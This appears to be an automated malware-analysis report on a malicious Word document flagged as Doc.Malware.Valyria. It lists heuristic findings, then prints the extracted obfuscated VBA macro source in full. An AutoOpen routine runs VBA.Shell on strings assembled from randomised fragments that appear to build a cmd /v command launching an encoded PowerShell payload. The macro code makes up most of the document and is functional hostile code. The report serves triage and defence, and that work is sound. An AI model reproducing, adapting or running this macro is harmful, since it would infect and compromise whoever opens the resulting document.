MALICIOUS
Risk Score: 112

Heuristics (6)
- ClamAV: Doc.Malware.Valyria-6691555-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6691555-0
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- VBA macros detected (medium, 1 related finding, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: Sub AutoOpen()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13887 bytes |

SHA-256: 64a62de3f91c807460c3a96789888e36a217bf0c4d8fb845a6ed1cdfbc6be1ad
Detection: ClamAV: No threats found
Obfuscation or payload: likely. 152 of 213 identifiers look randomly generated (e.g. 'lPLpztrGVIiGft') — consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):

Attribute VB_Name = "fIzspJDt"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Error FuIla
Hour wzGJuG
Error Sin(8)
Error QIHNLA
VBA.Shell% KeyString(JEWYLiJQJ + uktfbQR + vbKeyC + kBzocMhPu + LiblRPPf) + pzPGPnMPhUInw + FhvzztVT + jYWuFbhtjQb + UnKzDWBZEv + TvKDGXDWj + wtclHM + bYsRozcNBOh + bnWbm + BIsrlTnLRtF + olmlXjBh + iJcomUoUp + MnrLMJW + BjiMYUzNVCXiud + UfVuTjvRzfEB, 748545624 - 748545624
Hour CDec(41936 / WlGVwi - 52107 - uIwRQh)
Hour Sqr(23)
End Sub
Attribute VB_Name = "AdjHsfbVoQN"
Function jYWuFbhtjQb()
On Error Resume Next
Hour CByte(5)
Hour 2
szHGsqi = "md" + " " + " " + " " + " " + "/" + "v" + " " + " " + " "
Error AdmGkX
Hour RODPK
iPzWVL = " " + " " + " " + " " + " " + " " + " " + " /" + "R " + " " + CStr(Chr(ZurjnMNibq + lPLpztrGVIiGft + 34 + azNzWtABb + jHEzHsrQvnaju)) + " "
Hour 9
Hour Hex(3427 + VYzIWk * qwTUE - BoZclS)
Error 2487
bRRBPcKr = " " + " " + "S" + "e" + "t" + " # "
Error Log(WzwETj)
Error 510
Hour BInrh
lzJfQQfnfC = " " + "=" + "p" + "@)e" + "rOh"
Hour CDbl(nEvNZ)
Error Cos(8)
hbLiXKET = "ell" + " -" + "e" + " JA" + ".:A"
Error bJwAQG
Error Sgn(673)
Eavsd = "E" + "Y" + "A6g" + "A9A" + "[4A"
Hour 959
Error CDec(lUmcn)
Hour LCase(tBivIZ)
iCcjFTFEf = "Z#." + "3A" + "C0A" + "b)" + "." + "iA" + "[@" + "AZ" + "#." + "jA"
Error CCur(mQzmj)
Hour Log(8)
ajpUnRb = "H#A" + "}" + "A.{" + "A[U" + "Ad" + "A" + "Au" + "A"
Error 62
Error Month(8930 * YBrjbB + HCdKRT / iTOIlT)
YhoHb = "Fc" + "AZ#" + ".iA" + "E" + "M" + "A" + "bA" + ".pA"
jYWuFbhtjQb = szHGsqi + iPzWVL + bRRBPcKr + lzJfQQfnfC + hbLiXKET + Eavsd + iCcjFTFEf + ajpUnRb + YhoHb
Error qiuIp
Error CDate(sdODw)
End Function
Function UnKzDWBZEv()
On Error Resume Next
Error CDbl(fSikFw)
Hour Sin(3)
ZzPpc = "[U" + "Ab" + "g.0" + "A" + "DO" + "A" + "JA."
Error 333329628
Error CDate(85857 * tBrnR - 75167 + uwKio)
Error Int(TSFAl - GOrnzm + 49848 + OEUiZ)
ELGilhiu = "p" + "AEY" + "A" + "dg" + "A9A" + "CcA" + "a" + "A" + ".0"
Hour vCbKhI
Hour Rnd(8)
PjsJqQEfPP = "AH" + "#" + "A" + "cAA" + "$A" + "C8" + "A" + "L)." + ")AH" + "M" + "A" + "e"
Hour CStr(8)
Error Sqr(PjlOt)
BnbYRz = "#.j" + "A[g" + "A" + "Z#" + "." + "kA" + "[UA" + "bA." + "pA[" + "MA" + "c)." + "vA["
Error mIldtl
Hour 465724413
Error DJzjT
uiwqZ = "MA" + "a#." + "lAH" + "#A" + "e#A" + "uA[" + "8" + "Ac" + "g." + "nA"
UnKzDWBZEv = ZzPpc + ELGilhiu + PjsJqQEfPP + BnbYRz + uiwqZ
Hour Second(jWuGc)
Error iPNpV
Hour CBool(56847 * RHMsk - HXVJiR * RivQj)
End Function
Function TvKDGXDWj()
On Error Resume Next
Error JVqTzw
Hour Fix(NKZPZw)
Error 742
sVKLzudw = "C4" + "A" + "Y" + "#.1" + "A" + "C" + "8" + "A" + "M)"
Hour IzhXa
Hour CDbl(lBuWX * OaAbDF / YMkiG / jpmYa)
Hour Sqr(87)
sTnKpJKA = ".t" + "AHc" + "A#" + "A" + ".@A" + "H#A"
Error Val(2494)
Error Month(GDzqn)
UFpFpw = "dA." + ")AD" + "@" + "A" + "L" + ")A" + "v" + "A" + "[#" + "A" + "b)." + "OA["
Error Str(705)
Hour Cos(PjDTSH)
saGMjjXww = "MAa" + "#At" + "AHA" + "AZ#" + ".jA" + "[MA" + "Y#"
Error CBool(YzdTq)
Hour 7
phLmjs = ".0" + "A" + "[k" + "A" + "Lg" + ".pA" + "H#A" + "L)." + "5AD" + "cA" + "6#A" + "5AE" + "AAa"
Error Month(HLQnc - 14447)
Hour CCur(rqJqcj + 80971)
Hour TypeName(tdBvP + RJkrS)
ZhEhBFVuE = "A.0" + "AH#" + "AcA" + "A" + "$AC" + "8" + "AL" + ").z" + "A" + "["
Error Rnd(189351509)
Hour LnFSO
Error Sin(SAzdYv - VhITd)
YkRNbb = "gAb" + ").r" + "A[" + "8" + "Ab" + ")" + ".@" + "AHM" + "A" + "Y#."
Error Fix(VaVpib)
Error jFrCH
Hour Val(7019)
DvhzfY = "uA" + "[E" + "AdA" + "Au" + "A[" + "kAc"
Error CDate(BoNpvp)
Error CDate(29754 - RuzGCm)
Error Int(45)
FjXCT = "g" + "Av" + "AH" + "U" + "Aeg" + ".D" + "A" + "E0A" + "N#." + "yAH"
Error Atn(zYJMuq)
Error Cos(jtQcv)
Hour CCur(bYbwa)
hiBErREBR = "}" + "AW#" + ".AA" + "[g" + "A" + "dA." + "0A" + "HAA" + "{g" + "Av" + "AC8" + "Aa"
Hour Int(mKdLcD)
Hour 439336224
Hour TypeName(9457)
HRakTVmW = ")" + ".hA" + "[4" + "AZ" + "A." + "v" + "AH" + "MA" + "a#." + "p" + "AC" + "4Ab" + "g.l"
Error 32
Hour 636
Hour 46
rbzYznVQY = "A" + "H" + "#AL" + ")." + "]" + "A[" + "YA" + "W#" + ".$" + "A[E" + "A#"
TvKDGXDWj = sVKLzudw + sTnKpJKA + UFpFpw + saGMjjXww + phLmjs + ZhEhBFVuE + YkRNbb + DvhzfY + FjXCT + hiBErREBR + HRakTVmW + rbzYznVQY
Hour TzjQDW
Hour Second(2)
Hour 41
End Function
Function wtclHM()
On Error Resume Next
Error Month(30)
Error 1
Hour wcsuM
bktwoJ = "A.@" + "AH#" + "Ad" + "A." + ")AD" + "@AL" + ")Av" + "A" + "[" + "YA"
Hour TimeValue(RflVb)
Error TypeName(BoIAjw)
GfvLzJcssGO = "c" + "g.h" + "A[M" + "A" + "dA." + "h" + "A[" + ")" + "A" + "Lg." + "2A"
Hour UhEKUi
Error cqdGiN
OLYzwMJ = "[4A" + "L)" + "." + "vAE" + ")A" + "J)" + "Au" + "AFM" + "A" + "cA." + "OA" + "[" + "k"
Hour 79
Error TimeValue(312)
Hour Month(335)
IFGiAknAnS = "Ad" + "AA@" + "AC" + "cA#" + "AAn" + "ACk"
Hour Cos(744)
Hour vbEsoL
Hour Tan(95)
hfbiT = "A{" + ")" + "AkA" + "E" + ")Ac" + "#." + "0" + "A"
Hour TypeName(iwZitM)
Hour jsskoc
SuPimPLoV = "C" + "AA" + "P" + "#A" + "gA" + "CcA" + "M" + "#" + "A" + "0A" + "DYA"
Error aPWGcw
Hour zSjTo
HDrDurHSNH = "J" + ")A" + "7A" + "C" + "#AW" + "A.U" + "AH" + "YAP" + "#Ak" + "A[" + "U" + "Ab"
Error CStr(lCDrQ)
Hour 26
Error bknkfH
KrSXhpVXG = "g.2" + "A" + "D" + "@A" + "c" + "A" + "."
Error CDbl(628)
Hour TypeName(69004 * IcujB * BYuuA * uiGLA)
Error TimeValue(31328938)
DOVcLRdUut = "1A" + "[}" + "Ab" + "A." + "p" + "A[" + "M" + "AK" + ")" + "A" + "n" + "AF"
Hour CBool(drrvV)
Hour CDec(776)
kciDTLjM = ")A" + "J" + ")Ar" + "AC" + "#A" + "TA." + "xAH" + "#" + "AK" + ")"
wtclHM = bktwoJ + GfvLzJcssGO + OLYzwMJ + IFGiAknAnS + hfbiT + SuPimPLoV + HDrDurHSNH + KrSXhpVXG + DOVcLRdUut + kciDTLjM
Hour ZjlMl
Error KjaBJ
End Function
Function bYsRozcNBOh()
On Error Resume Next
Hour 75
Error Fix(23)
Error 9
qCpjioROfz = "An" + "AC" + "4A" + "Z" + "#" + "." + "4" + "A" + "[U" + "AJ)" + "A7A" + "["
Hour CByte(9)
Hour CByte(QPnwFN)
UmidiHmzjt = "YAb" + ")." + "yA[" + "UAY" + "#." + "jA[" + "gA" + "KA" + "A" + "kA" + "H@" + "A" + "##"
Error Int(vJtlv / 2378)
Error Tan(Ujzhwb)
Error CDbl(FjJLs)
jrOGMuztMR = "." + "qAC" + "AAa" + "#.u" + "AC" + "A" + "AJA" + ".p" + "A" + "EYA"
Hour 265
Hour LCase(95)
HKKNSrmlt = "d" + "gAp" + "A" + "H" + "OAd" + "A" + "." + "yA"
Error noMLP
Error 53
Hour 72
hiqoH = "H" + "kA" + "e)" + "A" + "kA" + "[YA" + "sg"
Error Atn(UCLWnw / TootJE * jzJiHa / GTwzsJ)
Error 995
qHZzZ = ".W" + "AC4" + "As" + "A" + ".vA" + "HcA"
Hour Int(nalwwi)
Hour Fix(4293)
Error VwtiZ
zHVIjz = "bg." + "OA" + "[8" + "AY#" + "." + "kA" + "EY" + "Aa#" + ".O" + "A" + "[U"
bYsRozcNBOh = qCpjioROfz + UmidiHmzjt + jrOGMuztMR + HKKNSrmlt + hiqoH + qHZzZ + zHVIjz
Hour Atn(jPWvo + jbTzQV)
Error Sin(98)
Error CByte(NjOFzz)
End Function
Function bnWbm()
On Error Resume Next
Error Cos(26331 - rhptIk)
Hour Fix(77943 / wnVGV - 98326 * 34231)
iCiLIEFI = "AKA" + "AkA" + "H@" + "A##" + "." + "qAC"
Hour Fix(UIslHP + 43479 - wuNLj - bHPmn)
Error LilspN
zkKnfoZnlt = ")A" + "}" + "A" + "A" + "kA" + "Fg"
Hour Fix(70793 / 7914)
Hour wTqztW
Error hilWHt
iOBljZNjU = "A6A" + ".2A" + "Ck" + "A{)" + "." + "T" + "AH" + "#A" + "Y"
Hour tVmHFI
Hour TimeValue(2)
Hour CBool(fOFBIZ / sSCBQ)
IrEtCMwp = "#." + "yAH" + "#A" + "L#" + ".#" + "AH" + "}Ab" + ")." + "jA[" + "UAc" + ").z" + "AC" + "A"
Hour CBool(kwsEOb * FJzCPR)
Hour Atn(UbEop)
Error Oct(tqjOTF)
ciwzSSBkCj = "AJ" + "A." + "YA" + "F#A" + "d" + "g"
Error kjJKj
Hour CDbl(QZFkZ)
Error 387
DUckdEioqQX = "A7A" + "[}A" + "cg." + "lA[" + "EA" + "a" + ")A" + "7AH" + "0AY" + ")." + "h" + "AH#" + "A"
Error Second(78155 * qXJPOq - kVvqns / jRdwt)
Hour CDate(2)
jjdhWiXYCkb = "Y)" + "." + "@A" + "H" + "OA," + "#." + "9AC" + "A" + "A}A" + "AgA" + "CA" + "A}" + "AA"
Error CDate(KbTiSZ + aVNfb)
Error qBjYA
MSqLOKp = "gAC" + "AA}" + "AA" + "g" + "AC" + "AA" + "}AA" + "g" + "ACA" + "A}" + "AAg" + "ACA" + "A"
Error Second(PKzVV / MsrCn)
Error dsMcsD
Error Rnd(pjTrwo)
LGVCmR = "}A" + "A=&" + " " + " " + " " + " " + " " + " " + " " + " "
Hour VpmYvH
Error CDec(300)
Hour SWPzaV
YSDZzauWiRr = "S" + "et" + " " + " " + " " + " " + " " + " " + " "
Error 409492229
Hour 8759
LcYaMjKEBv = "] " + " =!" + "#" + " " + ":[" + "=G"
Error CVar(pGoZE)
Error lpPnY
MUmlLbz = "!&&" + " " + " " + " " + " Se" + "T " + " "
bnWbm = iCiLIEFI + zkKnfoZnlt + iOBljZNjU + IrEtCMwp + ciwzSSBkCj + DUckdEioqQX + jjdhWiXYCkb + MSqLOKp + LGVCmR + YSDZzauWiRr + LcYaMjKEBv + MUmlLbz
Hour Sin(96)
Error CBool(UiqUm)
Error LCase(bfjBRk)
End Function
Function BIsrlTnLRtF()
On Error Resume Next
Hour DqGBN
Hour CDate(jSKMiq)
Error Month(724)
OrMQnTQI = " " + " " + " " + " " + "} " + "=!]" + " :" + "."
Hour qCOks
Error 46
Hour hLkojL
iCrffh = "=" + "B!&" + "& " + " " + " " + " "
Error CDate(vZolsw)
Error Val(251337497)
Hour Sin(VnUiVq / dOEZG * iwhazq + QLncEY)
TfjaPW = " " + " " + " " + " " + "SeT" + " " + " " + " " + " " + " " + " "
Hour Cos(52)
Hour CStr(soPKB - YKiUM)
KrwBt = " " + " #" + " " + " " + " =" + "!}" + " " + ":" + "s=" + "R!" + "&& " + " "
Error Atn(FuWKAr + zcTKW / 31526 * vtVZX)
Hour CStr(DquNbG)
Hour iWJhoZ
LKYkAiMallT = " " + " " + " " + " " + " " + " " + " S" + "Et" + " "
Hour 9
Error CStr(KLhvJ * fCYSE + jpwHi - uArBjP)
Error MdLSL
tYAHiIlA = " " + " " + " " + "\ " + " " + " =!" + "# " + " " + ":" + ",=f" + "!"
Error Hex(oVBfNS)
Hour 9
FAnNjITmj = "& " + " " + " " + " " + " s" + "ET" + " " + " "
Hour 60
Error CDate(HuhNZG)
ZSzWzdk = " " + " " + " $ " + " " + " =" + "!" + "\" + " "
Error Sqr(YNztD - fzSNr)
Hour CByte(IcSji)
mzYBmplNKs = " " + ":6=" + "V!" + "&" + "& " + " " + " " + " " + "s"
Hour Atn(EEmsqQ)
Error CBool(AfXHf)
iZNFdAwhCTB = "E" + "T " + " " + " " + " " + " -" + " " + " =" + "!$" + " " + " " + ":" + "O="
BIsrlTnLRtF = OrMQnTQI + iCrffh + TfjaPW + KrwBt + LKYkAiMallT + tYAHiIlA + FAnNjITmj + ZSzWzdk + mzYBmplNKs + iZNFdAwhCTB
Hour Sgn(3862)
Error 567
Error 32
End Function
Function olmlXjBh()
On Error Resume Next
Error Round(7)
Hour Fix(toFwDl)
iWdASLhXVX = "s!&" + " " + " " + " " + "S" + "eT" + " "
Error ZcsfM
Error Cos(87320 * DpkHwu * CBTUI * AMsia)
YHYAHjdWZz = " " + " " + " ," + " " + " =!" + "- " + ":]="
Hour AjtZcP
Error upjzL
nLzViTjY = "S!&" + " " + " " + "Se" + "t"
Error Val(KVPazF)
Error CCur(Zjszrt)
Error CVar(UVIMj)
wPqliGQV = " " + " " + " " + " " + " " + " _" + " " + " " + " "
Hour JrQFj
Hour Str(MLLkA)
Error Log(35)
ZchJiLRFYYB = "=!," + " " + " :$" + "=6" + "!& " + " " + " " + " " + "se" + "t " + " " + " "
Hour Log(ZrCjd)
Error Cos(Sunqj / DbwCH)
Error Rnd(6)
aztvMNz = " " + " " + "] " + " " + " =" + "!_ " + " " + " " + " " + " :" + "{=" + "O!&"
Hour Oct(351)
Error Sqr(74528 - qMFjhz / psIHt * jGfwIk)
Error TimeValue(91)
strsT = "& " + " " + " " + " " + " "
olmlXjBh = iWdASLhXVX + YHYAHjdWZz + nLzViTjY + wPqliGQV + ZchJiLRFYYB + aztvMNz + strsT
Error 6325
Error 13
End Function
Function iJcomUoUp()
On Error Resume Next
Error Atn(7)
Error Oct(8296)
Error Second(8155)
wzYSQDGWa = " " + " " + " S" + "Et " + " " + " "
Error Second(316942206)
Error CDbl(8856)
YajRl = " " + " " + "} " + " " + " " + " " + "=!]" + " " + " " + ":"
Error CDec(wdddW * 54591)
Error 3100
rprNkiGLYF = "}=I" + "!& " + " " + " " + " " + " " + " " + " "
Error CVar(AfCTdw)
Hour Fix(wAriz / SIvTl * 3652 / nNjncB)
SDETbbpM = " " + "S" + "e" + "T" + " " + " " + " " + " " + "? " + "=" + "!} " + " "
Error CDbl(15460 + jwbCl / kSGDL - iORia)
Error jPcNL
rmOtHDEDi = " " + ":" + ")=" + "w!&" + "&" + " "
Error Int(1271)
Error 6846
Hour 307042667
GLhhzv = " " + " " + " " + " " + " s" + "E" + "T " + " " + " " + " " + " -"
Error 293
Hour Second(ozHhXB / lLAiwP)
fZFXbzKskZ = " " + " =!" + "? " + " :" + "@=" + "o" + "!&&" + " " + " " + " " + " " + " " + " "
Error TypeName(VzbIY + nHjPpT)
Hour 819
Hour CBool(7957 + Jlbih - jGYfb * PzPww)
WwUMDU = " " + "sET" + " " + " " + " " + " " + " " + " " + " " + " ["
Hour CVar(263060394)
Error 8
sbvzIttr = " " + " =" + "!- " + " " + " "
iJcomUoUp = wzYSQDGWa + YajRl + rprNkiGLYF + SDETbbpM + rmOtHDEDi + GLhhzv + fZFXbzKskZ + WwUMDU + sbvzIttr
Error Round(512702594)
Hour CDec(KAwIM)
End Function
Function MnrLMJW()
On Error Resume Next
Error Sgn(452612950)
Error MnhBO
Error 3
wKJavo = "::=" + "m!" + "&" + " " + " " + " "
Error 8638
Error 2560
Error Month(1775)
sdTEGhdcip = " " + " " + " " + " " + " " + "s" + "ET" + " " + " " + ";" + " "
Hour CDate(3)
Hour CStr(UTslG - 87384 * pbQVW / lwMTt)
HVuSKlLpXO = " " + "=" + "![ " + " :" + "#=Q" + "!&" + " "
Hour 1950
Hour Round(408)
hSUCTJjG = " " + "CaL" + "l " + " " + " " + "%"
Error 364
Error CVar(ZMRjNG)
Hour 9
nEifuBQ = "; " + " " + "%" + " " + " " + " " + " " + CStr(Chr(DQLlEurtEdd + rOKOvELwQK + 34 + ocZfANSlv + ppzvoNAUitTY)) + " " + " "
MnrLMJW = wKJavo + sdTEGhdcip + HVuSKlLpXO + hSUCTJjG + nEifuBQ
Hour 3800
Error Str(oTbbOU)
Hour Cos(8631)
End Function